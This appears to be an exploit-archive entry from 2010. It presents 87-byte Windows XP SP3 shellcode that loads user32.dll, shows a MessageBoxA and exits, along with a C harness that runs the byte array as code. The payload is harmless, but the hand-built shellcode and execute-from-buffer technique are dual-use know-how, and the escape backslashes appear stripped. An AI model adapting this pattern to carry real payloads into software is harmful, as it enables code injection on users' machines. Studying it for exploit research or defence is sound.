Windows XP SP3 English MessageBoxA Shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Windows XP SP3 English MessageBoxA Shellcode - 87 bytes
# Published : 2010-08-20
# Author :
# Previous Title : Windows Seven x64 (cmd) Shellcode 61 Bytes
# Next Title : Linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes

/* 
Title: Windows XP SP3 English MessageBoxA Shellcode (87 bytes)
Date: August 20, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Tested on: Windows XP SP3 En
Thanks: ishtus
Greetz: Astalavista, OffSEC, Exploit-DB

EDB Notes:
Tested under Windows XP SP3 Eng
The correct memory address for GetProcAddress() appears to be different on our test machine,
which is 0x7c80ae30.
*/

#include <stdio.h>

char shellcode[] =
"x31xc0x31xdbx31xc9x31xd2"
"x51x68x6cx6cx20x20x68x33"
"x32x2ex64x68x75x73x65x72"
"x89xe1xbbx7bx1dx80x7cx51" // 0x7c801d7b ; LoadLibraryA(user32.dll)
"xffxd3xb9x5ex67x30xefx81"
"xc1x11x11x11x11x51x68x61"
"x67x65x42x68x4dx65x73x73"
"x89xe1x51x50xbbx40xaex80" // 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
"x7cxffxd3x89xe1x31xd2x52"
"x51x51x52xffxd0x31xc0x50"
"xb8x12xcbx81x7cxffxd0";    // 0x7c81cb12 ; ExitProcess(0)

int main(int argc, char **argv)
{
   int (*func)();
   func = (int (*)()) shellcode;
   printf("Shellcode Length is : %d",strlen(shellcode));
   (int)(*func)();
   
}